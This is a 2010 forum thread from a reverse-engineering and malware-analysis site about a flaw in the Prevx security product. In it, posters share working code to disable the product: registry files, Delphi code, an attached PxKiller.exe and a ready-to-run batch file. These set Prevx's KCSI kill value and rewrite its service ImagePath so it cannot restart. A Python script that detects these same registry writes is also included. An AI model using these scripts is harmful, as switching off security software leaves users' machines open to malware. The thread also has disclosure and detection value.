A forum for reverse engineering, OS internals and malware analysis 

All off-topic discussion goes here.
 #2949  by ssj100
 Wed Oct 06, 2010 6:19 pm
It's a marketing tactic haha. One reason why I don't have much respect for Prevx in general.
 #2993  by STRELiTZIA
 Sun Oct 10, 2010 7:53 am
Hi,

Prevx Registry value “KCSI” Exploit.


Prevx tries to read the data contained in the registry value "\PCSI\KCSI", and eventually makes it null if it contains data different from zero.

Roots and keys:
HKLM\SOFTWARE\PCSI\KCSI
HKCU\Software\PCSI\KCSI
HKU\.DEFAULT\Software\PCSI\KCSI
Value         : KCSI
Data type     : REG_DWORD
Data value    : $00000001
This value does not exist when you install Prevx, but it continually seeks it every time.

By changing the data stored in this value to "1", Prevx was killed instantly, but the Prevx processes resurrected.

To bypass resurrection, we can corrupt the service or driver key values by synchronizing the modification after the process is completed, or use a loop to write the value "1" every second.

Settings:
- Turn 'ON' Monitoring to get MAXIMUM Protection (this option prevents any Prevx registry keys malicious modification).


Use Windows registry file to add new values:

------ KillPrevxOneTime.reg --------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\PCSI]
"KCSI"=dword:00000001
--------- CorruptCSIScanner.reg ----------
Windows Registry Editor Version 5.00

;Corrupt ImagePath to ""C:\Program Files\Prevx\prevx1.exe" /service"
;hex(2) = REG_EXPAND_SZ; the bytes are that string in UTF-16LE with a NUL terminator
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CSIScanner]
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,\
  6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,50,00,72,00,65,00,76,00,78,\
  00,5c,00,70,00,72,00,65,00,76,00,78,00,31,00,2e,00,65,00,78,00,65,00,22,00,\
  20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00

Launch "KillPrevxOneTime.reg" then "CorruptCSIScanner.reg"; you must synchronize these operations.

Delphi part of the code, without optimization and checks:
uses
  Windows, Registry;  { Sleep comes from Windows, TRegistry from Registry }

procedure KillPx();
var
  Reg: TRegistry;
begin
  Reg := TRegistry.Create;
  try
    Reg.RootKey := HKEY_LOCAL_MACHINE;

    { 1. Write a non-zero KCSI value; Prevx polls this value and stops itself }
    Reg.OpenKey('\SOFTWARE\PCSI', False);
    Reg.WriteInteger('KCSI', $00000001);

    { 2. Give the processes time to go down before touching the service key }
    Sleep(1500);

    { 3. Corrupt the service ImagePath so the resurrected service cannot come back }
    Reg.OpenKey('\SYSTEM\CurrentControlSet\Services\CSIScanner', False);
    Reg.WriteExpandString('ImagePath', '"C:\Program Files\Prevx\prevx1.exe" /service');

    Reg.CloseKey;
  finally
    Reg.Free;
  end;
end;
Working application attached:
PxKiller.exe
KillPxOneTime.reg
CorruptCSIScanner.reg
Readme.txt


Regards.
Attachments
(40.96 KiB) Downloaded 33 times
 #2994  by EP_X0FF
 Sun Oct 10, 2010 8:37 am
LOL, product full of laughable beginner bugs.
 #2997  by ssj100
 Sun Oct 10, 2010 9:17 am
Nice, just tested it and Prevx is completely hosed haha. Since I know Prevx associates read this thread, may I respectfully suggest (once more) to think about implementing a HIPS component into your product.
 #3013  by STRELiTZIA
 Tue Oct 12, 2010 9:58 am
Triple Helix wrote: Fixed in 5 minutes! http://www.wilderssecurity.com/showpost ... ostcount=9

TH
Hello TH,
Happy for you :)
The bug is published to be fixed (this is not a personal attack against Prevx, it's just a subject for my studies)

But I noticed that the registry value remains active and is still used to kill the process;
certainly it is a little better protected, but still accessible and can be BYPASSED.

Regards.
 #3015  by STRELiTZIA
 Tue Oct 12, 2010 10:12 am
Yes, it will be convenient for Prevx, but for now I prefer to share information in public ...
maybe in the future, who knows :)

because studying a real case like Prevx is very interesting.
 #3030  by sparviero
 Wed Oct 13, 2010 10:02 pm
Hello TH,

Miserable, nothing has changed, continuing lies by Prevx. :mrgreen:
PxKiller.exe was added to the black-list as Medium Risk Malware, and that's all.

Save this as a *.bat file and run.
@echo off
rem set the KCSI kill value, then corrupt the service ImagePath (prevx1.exe)
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 1 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx1.exe" /service" /f
Prevx is completely hosed! (no alert about Medium Risk Malware) lol
If you like to continue playing with this miserably coded software,

Save this as a *.bat file and run.
@echo off
rem clear the KCSI value and point the service back at the real prevx.exe
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 0 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx.exe" /service" /f
Prevx returns to normal, and you can expect to be protected! :lol:
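From the defender's side, the two posts above (STRELiTZIA's .reg files and sparviero's batch files) pin down exactly two registry locations worth watching: the PCSI\KCSI value and the CSIScanner service ImagePath. The script below is an added example, not code from the thread or from Prevx: it runs a small detection rule over constructed log lines (field names loosely modelled on Sysmon Event ID 13 "RegistryValueSet" events, but not real Sysmon output) and flags a non-zero KCSI write or an ImagePath that no longer points at prevx.exe. Treating prevx.exe as the expected service image is an assumption taken from the restore .bat above; the key paths are the ones posted in the thread.

```python
import re
from dataclasses import dataclass

# Registry locations named in the thread (assumption: paths exactly as posted).
KCSI_PATHS = (
    r"HKLM\SOFTWARE\PCSI\KCSI",
    r"HKCU\Software\PCSI\KCSI",
    r"HKU\.DEFAULT\Software\PCSI\KCSI",
)
SERVICE_IMAGEPATH = r"HKLM\SYSTEM\CurrentControlSet\Services\CSIScanner\ImagePath"
EXPECTED_IMAGE = "prevx.exe"  # assumption: taken from the restore .bat in the thread

# Constructed sample log (not real Sysmon output; fields loosely follow Event ID 13).
SAMPLE_LOG = r"""
ts=2010-10-10T07:53:01 eid=13 image=C:\Windows\explorer.exe target=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Foo details=Bar
ts=2010-10-10T07:53:02 eid=13 image=C:\Users\lab\PxKiller.exe target=HKLM\SOFTWARE\PCSI\KCSI details=DWORD (0x00000001)
ts=2010-10-10T07:53:03 eid=13 image=C:\Users\lab\PxKiller.exe target=HKLM\SYSTEM\CurrentControlSet\Services\CSIScanner\ImagePath details="C:\Program Files\Prevx\prevx1.exe" /service
ts=2010-10-10T07:55:00 eid=13 image=C:\Windows\System32\reg.exe target=HKLM\SOFTWARE\PCSI\KCSI details=DWORD (0x00000000)
ts=2010-10-10T07:55:01 eid=13 image=C:\Windows\System32\reg.exe target=HKLM\SYSTEM\CurrentControlSet\Services\CSIScanner\ImagePath details="%ProgramFiles%\Prevx\prevx.exe" /service
"""

LINE_RE = re.compile(r"^ts=(\S+) eid=(\d+) image=(.+?) target=(\S+) details=(.*)$")
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]+)\)")
QUOTED_RE = re.compile(r'"([^"]+)"')


@dataclass
class Alert:
    ts: str
    severity: str
    rule: str
    image: str
    detail: str


def parse_line(line):
    """Split one constructed log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, eid, image, target, details = m.groups()
    return {"ts": ts, "eid": int(eid), "image": image, "target": target, "details": details}


def image_basename(image_path):
    """Basename of the executable in an ImagePath such as '"C:\\x\\y.exe" /service'."""
    m = QUOTED_RE.search(image_path)
    exe = m.group(1) if m else image_path.split()[0]
    return exe.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Apply the two rules to one value-set event; registry paths compare case-insensitively."""
    if ev["eid"] != 13:
        return None
    target = ev["target"].lower()
    if target in {p.lower() for p in KCSI_PATHS}:
        m = DWORD_RE.search(ev["details"])
        value = int(m.group(1), 16) if m else None
        if value is None or value != 0:
            # Non-zero (or non-DWORD) data is the kill condition described in the thread.
            return Alert(ev["ts"], "high", "prevx-kill-switch-set", ev["image"], f"KCSI={value}")
        return Alert(ev["ts"], "info", "prevx-kill-switch-cleared", ev["image"], "KCSI=0")
    if target == SERVICE_IMAGEPATH.lower():
        exe = image_basename(ev["details"])
        if exe != EXPECTED_IMAGE:
            return Alert(ev["ts"], "high", "prevx-service-image-redirected", ev["image"], exe)
        return Alert(ev["ts"], "info", "prevx-service-image-restored", ev["image"], exe)
    return None


def scan(log_text):
    """Run the rules over a whole log and return the alerts in order."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        alert = check_event(ev)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.ts} [{a.severity}] {a.rule} by {a.image}: {a.detail}")
```

The useful signal is the pairing: a KCSI write followed within seconds by an ImagePath change from a process that is not the product's own installer is the exact sequence both posts describe, and the writing process name (PxKiller.exe, reg.exe) tells you whether it was a tool or an interactive operator.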
 #3036  by EP_X0FF
 Thu Oct 14, 2010 8:56 am
While running for self-protection recovery, Prevx created perfect BSOD generation software in build 209.

INVALID_KERNEL_HANDLE blue screen of death with just a few clicks :)